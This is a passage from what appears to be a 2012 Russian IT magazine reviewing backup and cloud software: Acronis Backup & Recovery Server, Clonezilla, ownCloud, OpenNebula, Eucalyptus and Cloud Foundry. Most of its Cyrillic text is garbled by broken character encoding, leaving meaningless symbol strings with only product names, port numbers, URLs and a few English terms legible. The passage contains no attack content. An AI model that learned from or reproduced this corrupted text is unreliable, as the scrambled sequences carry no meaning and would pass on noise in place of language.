Win7, 67A940/;526 60C;FG3 UAC.

#4B8-96G2@K 26130/;5 .6</0 7@05 :?-E 03=6?, 674 3./F0 1E6:-2@K B84L3G/1C3K 320/8L/K1, 26 60;3G4F01A 247686. C6.=62/206?. P4C, 94B8-96G2@K 26130/;5 Acronis 6126?42 24 Linux 3 8/C6./2-:-/01A ? 76;5I3210?/ 1;-G4/?. "1;3 6768-:6?423/ 841=6924/01A 2/?/826, 1;/:-/0 31=6;596?405 94B8-96G2@K 26130/;5 PXE, 167842-2@K ? 18/:/ WinPE (08/7-/01A WAIK). D61;/ 1768C3 94B8-96G2@E C6.=62/206? 3E 1;/:-/0 =/8/:405 24 ?@78422@K PXE-1/8?/8.

);A -=84?;/23A 31=6;59-/01A B84L3G/1C4A C6216;5 3 18/:-10?4 C6.42:26K 1086C3. ,4. =86>/11 32104;;A>33 C6.=62/206? ASD 3 =61;/:-FH4A 847604 ? C6216;3 =8639?6:A01A =83 =6.6H3 =62A02@E .410/86?, 1?6:AH3E C .323.-.- 831C 2/C688/C026K -10426?C3 =484./086?. (49?423A =-2C06? ./2F G/0C3/ 3 C62-C8/02@/, C 06.- </ =86:-C0 E686I6 :6C-./20386?42 3 ;6C4;396-?42, =6M06.- =867;/. 1 /B6 31=6;596?423/. 67@G26 2/ ?6923C4-/0. D61;/ 94=-1C4 C6216;5 =6:C;FG4/01A C ;6C4;526.- 1/8?/8-; /1;3 2-<26 -=84?;A05 C6.=62/206. (1/8?/8, 1/8?/8 ;3>/293K, PXE-1/8?/8 3 4B/20 -=84?;/23A), 24E6:AH3.1A 24 :8-B6K .4I32/, ?@7384/. =-2C0 ./2F «D6:C;FG3051A» 3 -C49@?4/. IP-4:8/1. ,69:423/ 3 241086KC4 678494 =8639?6:A01A 39 ./2F «QC842 =83?/010?3A».

$1/ 16/:32/23A ./<:- 4B/206. 3 1/8?/86. 94H3H/2@, G06 =6-9?6;A/0 397/<405 =/8/E?404 32L68.4>33. D83 31=6;596?4233 PXE :;A -10426?C3 &, /105 6:24 6=4126105: /1;3 ? BIOS =6 6I37C/ 7-:/0 6104?;/24 1/0/?4A 94B8-9C4, =6;596?40/;5 .6</0 323>3386?405 32104;;A>3F. D6M06.- =86B84..- -10426?C3 ;-GI/ 94H30305 =486-;/., ??/:A /B6 ? 1660?/010?-FH/. 6C2/ .410/84. );A 67/1=/G/23A 84760@ PXE ? 1/03 :6;</2 7@05 4C03?/2 DHCP-1/8?/8.

R3>/2933 24 ASD 08/7-F01A :;A C4<:6K 849?/80@?4/.6K .4I32@: 24 ;F76/ C6;3G/10?6 -10426?6C 24 C62C8/026K .4I32/ 3;3 6:2- -1=/I2-F -10426?C- 24 ;F76K .4I32/ (601;/<3?4/01A =6 N',-4:8/1-). R3>/293A .6</0 7@05 :?-E 03=6? — 1/8?/824A 3;3 DJ, =6 ./8/ -10426?C3 623 67@G26 841=8/:/;AF01A 4?06.403-G/1C3. (6 /1;3 .410/8 849?/80@?423A 2/ 924/0, C4C6K 03= ;3>/2933 =83./2305 24 0/C-H-F -10426?C-, 7-:/0 ?@:42 94=861.

!"#$% &'#()*#+,"- ./, (0 #$12,"0'-(# 3#&43,"- 3*#3*)0",*(%5 Acronis, 6#7(# +%$*,"- #8)( )2 3*#0&"#+ 9 Open Source '):0(2)05. ;,)$#'-<05 3#34'1*(#9"-= 3#'-240"91 Clonezilla (clonezilla.org), &#"#*,1 3#2+#'10" 9#28,+,"- ) +#99",-(,+')+,"- ./ )2 #$*,2,. .>):),'-(# 3#880*7)+,0"91 $#'-<#0 &#')?09"+# @/, )93#'-2406%A + Linux (+&'=?,1 LVM), Windows, *BSD, Mac OS X ) 3*#84&",A VMware, + &#"#*%A *020*+)*4="91 "#'-&# 2,(1"%0 $'#&) ()93#'-240"91 Partclone, Partimage )') ntfsclone). .9",'-(%0 6#7-(# «9(1"-» 3#90&"#*(#, 8'1 B")A :0'05 3*)60(10"91 dd. C#B"#64 &,&)A-')$# #D*,()?0()5 3# ./ (0". E024'-"," 9#A*,-(10"91 '#&,'-(#, (, 960((%5 (#9)"0'- ) 48,'0((%5 90*+0* (SSH, SMB, NFS). /30:),'-(,1 +0*9)1 Clonezilla SE (Server Edition) 3#2+#'10" &'#()*#+,"- #$*,2% (, (09&#'-&# 9)9"06 3*) 3#6#F) PXE, + "#6 ?)9'0 9 )93#'-2#+,()06 multicast. G#(0?(#, +90 (,9"*#5&) DHCP, PXE, TFTP ) NFS 3#"*0$40"91 3*#)2+09") +*4?(4=, (# #() A#*#<# 8#&460(")*#+,(%, 3#B"#64 3*#$'06 $%"- (0 8#'7(#.

CLONEZILLA — !"#$%!&%$'( ')*+#&$'+,-'

"./01 23/45.678 7.9:.2124; <.0=2; >;4? :151<32; 23 PXE-/15@15

INFO

• !> 8/:.0?A.@3288 Windows AIK B8436 @ /43-4?1 «%39./>.52;1 .723» @ 01/2009 2.9151 ][.

• ".<5.>2. . 23/45.671 Windows Deployment Services B8436 @ 06/2007 @;:C/71 ][.

• D0E VMware vSphere 808 MS Hyper-V @.A-9.=2. 8/:.0?A.@3281 1<82.F. 3F1243 <0E G./4-93H82;, :.A@.0EIJ1F. 7.245.085.@34? /53AC @/1 VM.

• Acronis Backup & Recovery Server :.<-<15=8@314 x86/x64 !% Windows, 23B823E .4 2kSP4 8 Linux, K360.@;1 /8/419; FAT16/32, NTFS, ext2/3/4, ReiserFS, XFS 8 JFS.

WARNING

• D0E 53>.4; Acronis Universal Deploy 451>C-14/E .475;4? TCP/445, TCP/9876, UDP/9876, UDP/9877, TCP/25001 8 <0E PXE — UDP/67-69.

• L4.>; :.0?A.@3410? 21 9.F /0CB362. 828M8-85.@34? PXE-C/432.@7C, 23/45.678 0CBH1 A3-J8484? :35.019.

!"#$%&'()* + '",)&-+)*

!"#$% 09 /164/ 2012 123

-.&"#", -/&"'+0%'+% '"/&(#1+ '" ,%)*, "$)-2")+0%,1-% &"#.+%'+% 1-3++ '" 0",)+, $43-5'%'+% 1-2"'6 3%&%6 -3%&"7+%8 + 3-,5% -3%&"7++. 9-$": &%#%&$'": 1-3+: 2-;%) ,-#6"$")*,: -6'-&"#-$-, 3- &",3+,"'+< + 3&+ '",)(35%'++ -3&%6%5%''-/- ,-.4)+: ('"3&+-2%&, $4=-6 3-5*#-$")%5: +# ,+,)%24). >&-2% ?)-/-, 3&%6(,)"'-$1+ ,-6%&;") '%,1-5*1- /-)-$4= ,=%2. @,% ?)- 6"%) "62+'( /+.1+% $-#2-;'-,)+ (3&"$5%'+: 3&-7%,,-2.

!%#%&$'-% 1-3+&-$"'+% 2-;%) $43-5':)*,: '" (,)&-8,)$" =&"'%'+: SAN/NAS, -3)+0%,1+% 3&+$-64 + 5%')-0'4% (,)&-8-,)$", ,%)%$4% 3"31+ + FTP-,%&$%&. A&+0%2 2",)%& &%#%&$'-/- 1-3+&-$"'+: 3-#$-5:%) (1"#")* 6- 3:)+ 2%,) =&"'%'+: B"85-$, 3-$4C": )%2 ,"242 +#.4)-0'-,)*. @ 3&-7%,,% =&"'%'+: 2-;'- 3%&%2%D")* (,)"&%$C+% 1-3++ +# -6'-/- =&"'+5+D" $ 6&(/-%. E5: 1-23*<)%&-$, 1-)-&4% 0",)- '"=-6:),: $'% 5-1"51+, 2-;'- #"6")* .?1"3 $ ,3%7+"5*'48 &"#6%5 ;%,)1-/- 6+,1" Acronis Secure Zone (ASZ, 3- ,()+, ?)- FAT32 , 2%)1-8 ACRONIS SZ + 1-6-2 partition type 0xBC), #"D+D%''48 -) $+&(,-$ + ,1&4)48 -) 3-5*#-$")%5:. F6-.'-, 0)- $-,,)"'-$+)* 6"''4% +# ASZ 2-;'- -0%'* .4,)&-, '- ?)- '% ,3","%) $ ,5(0"% $4=-6" +# ,)&-: ,"2-/- ;%,)1-/- 6+,1".

G-6(5* 6%6(35+1"7++ ?1-'-2+) 6+,1-$-% 3&-,)&"',)$-, (,)&"':: 6(.5+&-$"'+% +6%')+0'4= 6"''4=: %,5+ $ =&"'+5+D% (;% +2%%),: "&=+$+&(%248 B"85, )- 3&-,)- ,-#6"%),: ,,451". E5: -.%-

,3%0%'+: 7%5-,)'-,)+ 6"''4= '" (&-$'% 3&+5-;%'+8 +,3-5*#(%),: )%='-5-/+: )%'%$-/- 1-3+&-$"'+: Windows VSS (Volume Shadow Copy Service). E5: =&"'%'+: 3&%65"/"%),: ,-.,)$%''-% -'5"8'--$-% =&"'+5+D% Acronis Backup & Recovery Online, 1-)-&-% 2-;'- +,3-5*#-$")* 1"1 $2%,)% , &%C%'+%2 -) Acronis, )"1 + -)6%5*'-. E"''4% $ )"1-2 =&"'+5+D% 6-,)(3'4 +# 5<.-8 )-01+, 0)- 3-#$-5:-%) #"D+)+)*,: -) B-&,-2";-&'4= -.,)-:)%5*,)$ $&-6% ,)+=+8'-/- .%6,)$+: +5+ 1&";+ )%='+1+. E5: (2%'*C%'+: )&"B+1" 2-;'- #"3-5'+)* =&"'+5+D% 3-5'-8 1-3+%8 -6+' &"#, " $ 3-,5%6(<D%2 -)3&"$5:)* )-5*1- +#2%'%''4% 6"''4%.

A&+ .?1"3% 6"''4= , $+&)("5*'4= 2"C+' 2-;'- (,)"'-$+)* "/%') + 1-')&-5+&-$")* %/- &".-)( )-0'- )"1 ;%, 1"1 3&+ &".-)% , B+#+0%,1+2 ,%&$%&-2. E5: VMware vSphere +5+ MS Hyper-V $-#-2-;'- +,3-5*#-$"'+% %6+'-/- "/%')" 65: =-,)-2"C+'4, 3-#$-5:<-D%/- 1-')&-5+&-$")* ,&"#( $,% VM.

H'+21+ 3-#$-5:<) .4,)&- $-,,)"'-$+)* &".-)-,3-,-.'-,)* IH '" 3-6-.'-2 +5+ -)5+0"<D%2,: ;%5%#%, $ 3-,5%6'%2 ,5(0"% 3-'"6-.+),: Acronis Universal Restore. J/- B('17++ ,=-;+ , AUD + 3-#$-5:<) 5%/1- 3%&%'%,)+ ,%&$%& '" 6&(/-% -.-&(6-$"'+% $ =-6% 2-6%&'+#"7++, $43-5'+)* P2V-, V2P- + V2V-2+/&"7+< +5+ 15-'+&-$")* IH. @ )-2 0+,5% 3-66%&;+$"%),: "$)-2")+0%,1": ,2%'" +6%')+B+1")-&" .%#-3",'-,)+ Windows SID (Security ID).

J,5+ 1-23*<)%& '% #"3(,1"%),: +#-#" 1&"=" IH +5+ &"#&(C+-)%5*'-/- 6%8,)$+: $+&(,-$, &".-)-,3-,-.'-,)* IH 2-;'- $-,,)"-'-$+)* +# #"/&(#-0'-/- 2%'< +5+ , 3-2-D*< ,3%7+"5*'-/- 6+,1".

>"1 + 3-5-;%'- 3&-/&"22% .?1"3", 3-66%&;+$"%),: 3-5'-%, +'1&%2%')'-% + 6+BB%&%'7+"5*'-% 1-3+&-$"'+%, 0)- 3-#$-5:%) (2%'*C+)* &"#2%& ,-=&"':%24= 6"''4=. K5/-&+)2 +'1&%2%')'-/- .?1"3" +,3-5*#(%) 6"''4% NTFS, " '% 3%&%,1"'+&(%) $%,* 6+,1, 3-?)-2( '(;'4% B"854 '"=-6:),: .4,)&- + )"1": 1-3+: ,-#6"%),: $ 1&")0"8C+% ,&-1+.

A-66%&;+$"%),: x86/x64 IH Windows, '"0+'": -) 2kSP4, + B"8-5-$4% ,+,)%24 FAT16/32, NTFS. @%&,+: 65: Linux .(6%) &".-)")* '" 5<.4= 6+,)&+.()+$"= Linux 2.4.20+ + glibc $%&,++ '% '+;% 2.3.2. IB+7+"5*'- 3-66%&;+$"<),: RHEL/CentOS, Fedora, SLES, Ubuntu, Debian + B"85-$4% ,+,)%24 ext2/3/4, ReiserFS, XFS + JFS. H)-+) -)2%)+)*, 0)- 3&+ +,3-5*#-$"'++ 3-,5%6'+= )&%= LH '%5*#: $-,-,)"'"$5+$")* -)6%5*'4% B"854.

E5: '%.-5*C+= /&(33 1-23*<)%&-$ 3&%6'"#'"0%'4 $%&,++ ABR, '% +2%<D+% 7%')&"5+#-$"''-/- (3&"$5%'+:, #"6"'+: 3&+ ?)-2 (,)"'"$5+$"<),: 5-1"5*'-. E5: .-5*C+= -&/"'+#"7+8 ,5%6(%) $4.+&")* $"&+"') , 3&+,)"$1-8 Advanced. M+7%'#+-&(%),: ABR 3- 1-5+0%,)$( 1-23*<)%&-$, '- 65: Virtual Edition $-#2-;'- '%-/&"'+0%''-% 0+,5- 2+/&"7+8 P2V, V2P +5+ V2V '" =-,)-2"C+'( + -.&")'-. z

!"#$"%& Acronis Backup & Recovery Server

'%( )*$+,"-" ."$$+/#".%0#1( 2/##*3 4"5#" 1$6"%&7"./+& 7"#8 )07"6/$#"$+1 Acronis

9"72/04 6%/# ,070,.#"-" :"61,"./#1(

SYN/ACK

!"#$% 09 /164/ 2012124

!"#$"% &#"'()* (grinder@synack.ru)+,#-./ 0#,/*"1.( (martin@synack.ru)

OPEN SOURCE !"#"$%& '(& )!*+$%,+-%% SAAS/IAAS, ./).)0$1" %,2"$%34 %$5)!2+-%)$$1"

3"6$)()*%% % 3), 7+7 21 %6 8)./!%$%2+"2

!"#$#%&' #()*+*

!"#$%&#'( )#*+, -'.+,/0.1)2#,, *#* %)3%1+)."43#( &%1)/-3%1)4, $+5*%1)4 + 6*%3%,+( '.1/'1%2, %5"#738. 287+1".3+( 1)#"+ %&3+, +9 $"#238: IT-)'.3&%2 6)%$% $%&#. ;3%$+. %'$#3+9#<++ /=.

9#&/,#"+14 3#& ).,, 7)%58 23.&'+)4 %5"#738. '.>.3+( + -'%&/*)8 2+')/#"+9#<++ 2 12%+ +3?'#-1)'/*)/'8. @#&..,1(, &#338A %59%' -%,%=.) %-'.&."+)41( 1 285%'%,.

!"#$#%&' #()*+*

!"#$% 09 /164/ 2012 125

OWNCLOUD!"#$"%&'()*: ownCloud Inc.+",' -$&.*'": owncloud.org/)0.1#)2: GNU AGPL

,-./ .$ 0*1&2 .$%'03/&2 #4'/0#"0/&2 4"#'+3#%, 4"'-/*$/*5'/-/&2 -)6 #"7*/.$*8.. "*(#3& cloud-2"*/.).9*. :# ;</+8.#/*)< /*4#1./*'3 0'"%.0& Dropbox, box.net, Google Docs . Ubuntu One, /# #3).5*'306 %#$1#=/#03>? 4#)/#7# +#/3"#)6 /*- -*//&1.. @$/*-5*)>/# "*$%.%*)06 0##(9'03%#1 KDE, /# %4#0)'-03%.. #0/#%*3'). 4"#'+3* 0#$-*). +#11'"5'0+<? +#14*/.? ownCloud Inc., % $*-*5. +#3#"#A %2#-.3 4"'-#03*%)'/.' 0'"%.0#% /* (*$' ownCloud . 4)*3-/*6 4#--'"=+*. B (<-<9'1 4)*/."<'306 4"#-*%*3> . 7#3#%&A 0'"-%'" 0 4"'-<03*/#%)'//&1 ownCloud. :"#-<+3 (&03"# "*$%.%*'306, /#%&A "').$ 0 '9' (#)>C.1. %#$1#=/#0361. %&2#-.3 +*=-&' 3". 1'068*. D)6 -#03<4* + -*//&1 .04#)>$<'306 #(&5/&A %'(-("*<$'" .). 4"#3#+#) WebDAV, +#3#"&A 4#--'"=.%*'306 %# %0'2 0#%"'1'/-/&2 ,E . 4#$%#)6'3 /*03"#.3> -#03<4 + 2"*/.).9< +*+ + 0'3'%#1< -.0+<, #()'75*6 $*7"<$+<, .$1'/'/.' . 0#2"*/'/.' -*//&2 )?(&2 3.4#%. F*+=' /'-*%/# 4#6%.)06 04'8.*)>/&A +).'/3 ownCloud Sync Client, 4"'-#03*%)6?9.A %#$1#=/#03> 0./2"#/.$."#%*3> -*//&' 0 /*03#)>/#A 0.03'1#A, +#3#"*6 "*(#3*'3 4#- <4"*%)'/.'1 Linux, Windows .). Mac OS X.

G*5./*6 0 %'"0.. 3, % 0#03*% ownCloud %2#-.3 #/)*A/-"'-*+3#", 4#$%#)6?9.A "'-*+3."#%*3> 3'+03#%&' ;*A)& (% 3#1 5.0)' .0-2#-/&' 3'+03& 4"#7"*11) 4"61# % ("*<$'"'. :#--'"=.%*'306 4"#-01#3" PDF- . ODF-;*A)#%, +*)'/-*">, $*+)*-+., *-"'0/*6 +/.7*, ./3'";'A0 -)6 %'-'/.6 04.0+* -') TODO, +#/3"#)> %'"0.A ;*A)#%, C.;"#%*/.', 4"#.7"&%*/.' 1<$&+*)>/&2 ;*A)#%. F', +3# .1''3 -#03<4, 1#7<3 4"#01#3"'3> ".0</+. % ;#3#7*)'"'' 4#)>$#%*3')6. B#$1#=/* 0./2"#/.$*8.6 ;*A)#% . +*)'/-*"6, *-"'0/#A +/.7. 0 1#(.)>/&1 <03"#A03%#1 .). /*03#)>/&1 4".)#='/.'1, * 3*+=' 0 -"<7.1. 4#-#(/&1. 0.03'1*1., 4#--'"=.%*?9.1. 4"#3#+#) remoteStorage.

:#)>$#%*3')> 0*1#03#63')>/# <+*$&%*'3, +3# 1#='3 4"#5.3*3> 0#2"*/'//&' .1 ;*A)&. D#03<4 + ;*A)*1 . +*3*)#7*1 1#='3 (&3> 4"'-#03*%)'/ -)6 $*"'7.03"."#%*//&2 4#)>$#%*3')'A . 7"<44 ownCloud (4#0)' #3+"&3.6 -#03<4* #/. <%.-63 .2 % 1'/? «H*A)& ĺ Shared») .). % %.-' 4"61#A 00&)+., 7'/'"."<'1#A 4#)>$#%*3')'1 (/' 3"'(<'3 "'7.03"*8..). I'*).$#%*/ <-#(/&A 4#.0+ 4# -*//&1, '03> %#$1#=/#03> <03*/#%+. +%#3 . #7"*/.5'/.A /* 1*+0.1*)>-/&A "*$1'" ;*A)#%. :#--'"=+* Open Collaboration Services API 4#$%#)6'3 #34"*%)63> 0##(9'/.6 -"<7.1 4#)>$#%*3')61 5'"'$ 03*/-*"3/&A 1'2*/.$1 /#3.;.+*8.. KDE. :#--'"=.%*'306 "*(#3* 0# 0)<=(*1. OpenID . LDAP.

:"*%-*, +#1;#"3/*6 "*(#3* 0 ownCloud 7*"*/3."<'306 3#)>+# 4". .04#)>$#%*/.. 4#0)'-/.2 %'"0.A Firefox, Chrome . Opera, 0 /'+#3#"&1. %'"0.61. IE /*%.7*8.6 1#='3 (&3> $*3"<-/'/*. F*+=' %#$1#=/& 4"#()'1& 0 #3#("*='/.'1 -*//&2 /* /'+#3#"&2 4)*/C'3*2. B ./3'"/'3' -)6 ownCloud 1#=/# /*A3. (#)>C#' +#).-5'03%# "*0C."'/.A . 4".)#='/.A App Store, 4#$%#)6?9.2 0-')*3> "*(#3< 0 ownCloud '9' (#)'' <-#(/#A (/*4".1'", 4)*7./ -)6 0#%1'03/#7# 4#--'"=*/.6 ;#3#*)>(#1*; 1<$&+*)>/&A 0'"%'", 4#-$%#)6?9.A 4"#0)<C.%*3> 0#(03%'//<? 1<$&+*)>/<? +#))'+8.? 0 )?(#7# <03"#A03%* % 0'3.; 2"*/.).9' 4#-+*03#% . %.-'#"#).+#% 0 -#03<4#1 5'"'$ %'(-./3'";'A0 .). 5'"'$ 1'-.*4)''").

@/3'";'A0 0.03'1& 4'"'%'-'/ /* 1/#7.' 6$&+., % 3#1 5.0)' . "<00+.A. ,0%#.3> ./3'";'A0 ('$ (#)>C.2 $*3"<-/'/.A 01#='3 4#)>$#%*3')> 0 )?(&1 <"#%/'1 4#-7#3#%+..

E.03'1* /*4.0*/* /* PHP (-)6 <03*/#%+. . "*(#3& 3"'(<?3-06 1#-<). php5-json, php-xml, php-mbstring, php5-zip, php5-gd), % +*5'03%' EJKD 1#='3 (&3> .04#)>$#%*/* SQLite, PostgreSQL .). MySQL. :# 0<3., -)6 "*$%'"3&%*/.6 3"'(<'306 03*/-*"3/&A LAMP- .). WAMP-0'"%'". L3#(& <03*/#%.3> ).1.3& /* %&-')6'-1<? 4*163>, $*7"<$+< . "*$1'" ;*A)#%, % +#/;.7' php.ini 0)'-<'3 .$1'/.3> $/*5'/.6 -."'+3.% memory_limit, post_max_size . max_

file_uploads % (#)>C<? 03#"#/< (% 0)<5*' Ubuntu/Debian php.ini /*2#-.306 % +*3*)#7' /etc/php5/apache2). B#$1#=/# .04#)>$#%*/.' $*9.9'//#7# HTTPS-0#'-./'/.6, -)6 M3#7# /'#(2#-.1# ).C> 07'/'"."#%*3> 0'"3.;.+*3 0'"%'"*.

341*0)&1"561&7'6 9/108$&)#9&:)'.561&7'6 8/108$&7'&'" )7-&56#&9"1)2 10/10;.#&-"71&7'6 9/10<"7='"%)$4.>&7'6 8/10

OPENNEBULA!"#$"%&'()*: OpenNebula/C12G Labs +",' -$&.*'": opennebula.org/)0.1#)2: Apache License

:)*3;#"1*, 4"'-/*$/*5'//*6 -)6 #"7*/.$*8.. <4"*%)'/.6 %."-3<*).$*8.'A 8'/3"* #("*(#3+. -*//&2. :#$%#)6'3 4#-/63> IaaS (./;"*03"<+3<"* +*+ 0'"%.0), 4#2#=<? /* Amazon EC2, /# 4#)/#-03>? 4#-5./'//<? *-1./<. B #3).5.' #3 -"<7.2 4#-#(/&2 4"#'+3#%, "*$"*(#35.+. 0%#'A 8')>? 03*%63 %#$1#=/#03> "'*).$#%*3> %'0> 4#3'/8.*), $*)#='//&A % #()*5/#A +#/8'48.., * /' 4"#03# 0#$-*3>

?52 :&7'4-" * :"11@> ownCloud )7-&56#4.'72 &%@(1@, 9.%-%$"4#.$

8&56#&9"'.56 >&A.' $.:"*')$&9"'6 '.*7'&9@. B",5@, C$"12D).72 9 ownCloud, -$2>& 9 &*1. %$"4#.$"

SYN/ACK

!"#$% 09 /164/ 2012126

EC2, !"##$%&'()$*+, API — EC2 Query, OGF OCCI ' vCloud. -%).'/'0$ "1%)2"( #'+3"( !"##$%&'()$* SAN ' NAS, #/, #"+*4!) 3 .'5 + /61"7" 42/) 3/)+*$%) !"+%$#+*("5 Transfer Manager 5"&." '+!"/82"()*8 !%"*"3"/ NFS, SFTP, HTTP '/' '9 3"51'.):'6. ;/, 9%).$.', !)%)5$-*%"( OpenNebula 4+*).)(/'()$*+, MySQL '/' SQLite.

<)2('*'$ OpenNebula ='.).+'%4$*+, .$+3"/83'5' +!".+"%)5', ( >*"5 +!'+3$ 5"&." .)?*' 3)3 7"+4#)%+*($..@$, *)3 ' 3"55$%A$-+3'$ "%7).'2):''. B%$#' *$9, 3*" '+!"/824$* OpenNebula: CERN, FermiLab, China Mobile, C(%"!$?+3"$ 3"+5'A$+3"$ )7$.*+*(" ' #%4-7'$. D%"$3* !%$#/)7)$* 7"*"(@$ !)3$*@ #/, 4+*)."(3' .) Ubuntu, Debian, openSUSE ' RHEL/CentOS. E)3&$ +/$#4$* "*5$*'*8 ($+85) !"#%"1.46 #"345$.*):'6 !%"$3*) (.) ).7/'?+3"5).

!"#$%&'#()*#'+,* 10/10-.'&/0'1&,2)*#'+,* 9/10-.'+,',( &+3')*/'0(#&4 9/1052/'3(+#'+,* 9/106(+7,(8&."29'+,* 9/10

EUCALYPTUS :(/.(8',;&$: Eucalyptus Systems, Inc.<(=, 3.'2$,(: www.eucalyptus.com>&%2#/&4: GNU GPL

D%"7%)55.), !/)*="%5) #/, %$)/'2):'' A)+*.@9 ' 7'1%'#.@9 "1-/)3"( (IaaS), >3+!"%*'%4$* '.*$%=$?+, +"(5$+*'5@? + Amazon EC2 (Amazon Web Services API) ' S3. D%"$3* .)A)* 3)3 '++/$#"()*$/8-+3'? ( .$#%)9 University of California, Santa Barbara ' +*)/ "#."? '2 !$%(@9 %)2%)1"*"3, !%$#/)7)60'9 3"5!/$3+.46 )%9'*$3*4%4 4!%)(/$.', IaaS. C 2009 7"#) $7" %)2('*'$5 ' 3"55$%A$+3"? !"#-#$%&3"? 2).'5)$*+, Eucalyptus Systems, Inc. F$3"*"%"$ (%$5, !%$#/)7)/'+8 #() '2#).',: OpenCore Enterprise Edition ' Open Source. C /$*) 2012-7" %)2('()$*+, $#'.), Open Source ($%+', (($%",*.", 3 >*"54 %$G$.'6 %)2%)1"*A'3"( !"#*"/3.4/" +*%$-5'*$/8."$ %)2('*'$ OpenStack ' CloudStack). B$7"#., Eucalyptus '+!"/8246* ( H'.'+*$%+*($ "1"%".@ BIJ ' NASA, ) *)3&$ 5."7'$ '5$.'*@$ 3"5!).'', .)!%'5$% Sony, Infosys, Aerospace, Fuji Film.

K),(/$.) !"##$%&3) *)3'9 *$9."/"7'? ('%*4)/'2):'', 3)3 Xen, KVM ' VMware. F$+3"/83" 3/)+*$%"( 5"&." +(,2)*8 ( $#'."$ "1-/)3". <$)/'2"().@ .)+*%)'()$5@$ !"/'*'3' 4%"(., "1+/4&'().', ' #"+*4!), ("25"&."+*8 4!%)(/$.', IP, 4A$*.@5' 2)!'+,5' !"/82"-

4#"1."$ +%$#+*(" 4!%)(/$.', 7'!$%('2"%"5. L*3%@*), )%9'*$3*4%) !"2("/,$* !"#3/6A'*8 OpenNebula 3 /61"? !/)*="%5$ '/' 5$.$#-&$%4 4!%)(/$.', ('%*4)/'2):'$?. D"##$%&'()6*+, '.*$%=$?+@ 4!%)(/$.', 3 Public Clouds ' 7'1%'#.@$ "1/)3), !"2("/,60'$ "1M$#'.,*8 5$+*.46 '.=%)+*%43*4%4 ' !41/'A.@$ "1/)3), A*" #)$* ("25"&."+*8 /$73" 5)+G*)1'%"()*8 +%$#4 ( +/4A)$ .$"19"#'5"+*' (.)!%'5$%, !%' .$9()*3$ %$+4%+"(). B""*($*+*($..", 5"&." *)3&$ #'.)5'A." #"1)(/,*8 ' '+3/6A)*8 +"1+*($..@$ ('%*4)/8.@$ +$%-($%@, #"1'(),+8 .4&."7" 4%"(., !%"'2("#'*$/8."+*' +$%('+). D%' >*"5 "1/)A.46 +%$#4 5"74* '+!"/82"()*8 .$+3"/83" "%7).'2):'? '/' 5"&." !%"+*" +#)()*8 %$+4%+@ ( )%$.#4 + #$/$7'%"().'$5 !"/-."5"A'? ' .)+*%"?3"? 3("*. ;/, 4#"1."7" 4!%)(/$.', ('%*4)/8.@5' %$+4%+)5' ' 4A$*.@5' 2)!'+,5' '+!"/824$*+, .$+3"/83" 4%"(.$? )1+*%)3:''. E)3, ='2'A$+3'$ +$%($%@ "1M$#'.,6*+, ( 3/)+*$%@, ) 4+*)."(3' OpenNebula — ( 2".@ (oZones). N%"5$ *"7", '+!"/824$*+, 3".:$!:', 7%4!!, 3)&#), '2 3"*"%@9 5"&$* '5$*8 '.#'('#4)/8-.@$ 4+*)."(3' ' .)1"% #"+*4!.@9 %$+4%+"(, .$ !$%$+$3)60'9+, + "+*)/8.@5'. D%'+4*+*(4$* ("25"&."+*8 2)#).', "#."? '2 A$*@%$9 !"/'*'3 %)25$0$.', %$+4%+"( ( #)*)-:$.*%$ (Data Center Placement Policies). F)!%'5$%, !%' (@1"%$ packing 14#$* '+!"/82"()." 5'.'-5)/8."$ A'+/" +$%($%"( #/, %)25$0$.', VM.

;/, 4!%)(/$.', >/$5$.*)5' ='2'A$+3"? ' ('%*4)/8."? '.-=%)+*%43*4%@ '+!"/8246*+, 4*'/'*@ 3"5).#."? +*%"3' (onevm, onehost, oneuser, oneimage ' *)3 #)/$$) ' .$+3"/83" ($1-3".+"/$?. F) 3".$A.@9 !"/82"()*$/$? "%'$.*'%"(). Self-Service Portal, )#5'.'+*%'%"().'$ cloud-"3%4&$.'? (@!"/.,$*+, !%' !"5"0' OpenNebula Sunstone, #/, 4!%)(/$.', .$+3"/83'5' 2".)5' "#."7" !"/82"()*$/, +/4&'* OpenNebula Zones.

N".+"/' (3/6A)6* +%$#+*() #/, %)2($%*@().', ('%*4)/8-.@9 "3%4&$.'?, 4!%)(/$.', "1%)2)5' ' +$*,5', 5".'*"%'.7) ('.*$7%'%"().) +'+*$5) Ganglia), 3".*%"/, #"+*4!), "1$+!$A$.', 1$2"!)+."+*' ' 4!%)(/$.', 9%).'/'0$5. H$.$#&$% ('%*4)/8.@9 +$*$? !"2("/,$* )1+*%)7'%"()*8+, "* ='2'A$+3"? +$*', 4!%)(/,*8 ('%*4)/8.@5' +%$#)5' ' '2"/'%"()*8 .$3"*"%@$ '2 .'9.

O'2'A$+3'$ 42/@ 3/)+*$%) ( .)+*",0$$ (%$5, 5"74* '+!"/82"()*8 Xen, KVM ' VMware, 3%"5$ *"7", "1$+!$A'()$*+, #"!"/.'*$/8.), !"#-#$%&3) Hyper-V, OpenVZ, VirtualBox. <$)/'2"(). '.*$%=$?+ 3 Amazon

Cloud Foundry (cloudfoundry.org) !"#$%&'()*#& %+,+- +&."/&/- PaaS-%#"(0% (Platform as a service), !+1(+)*230- "'1"',+&40.'5 &#%&0"+('&6 %(+0 !"0)+7#80* 8' 58+7#%&(# 9"#-5(+".+( 0 *1/.+( !"+:"'550"+('80*: PHP, Python, .NET, Spring Java, Rails 0 Sinatra for Ruby, Node.js, Groovy, Grails, .+&+"/# 5+:;& (1'05+$#-%&(+('&6 % "'1)048/50 <=>? (MySQL, PostgreSQL, MongoDB, Redis, RabbitMQ, Neo4J). @'.&04#%.0 !+)61+('&#)2 !"#$+%&'()*#&%* ;7# :+&+(/- 8',+" "'1)048/A %"#$, .+&+"/- 8# 8;78+ "'1(+"'40('&6, $+%&'&+4-8+ )0B6 1':";10&6 8'!0%'88;2 !"+:"'55;. C'1(0&0#5 Cloud Foundry 1'805'#&%* VMware, 0%A+$8/- .+$ !+$ )0D#810#- Apache +!;,)0-.+('8 8' GitHub, 0, !+ %;&0, E&+ !#"(/- Open Source PaaS-!"+#.& !"+5/B)#88+:+ ;"+(8*. F 8'%&+*3## ("#5* 8#%.+)6.+ A+%&#"+( ;7# !"#$)':'2& %#"(0%, +%8+('88/- 8' Cloud Foundry. G"0 8#+,A+$0-5+%&0 5+78+ "'1(#"8;&6 %++&(#&%&(;23;2 %"#$; %'5+%&+*&#)68+. F Ubuntu $)* E&+:+ $+%&'&+48+ 0%!+)61+('&6 JuJu 0)0 !+$.)240&6 "#!+10&+"0- ppa:cloudfoundry/ppa, ( .+&+"+5 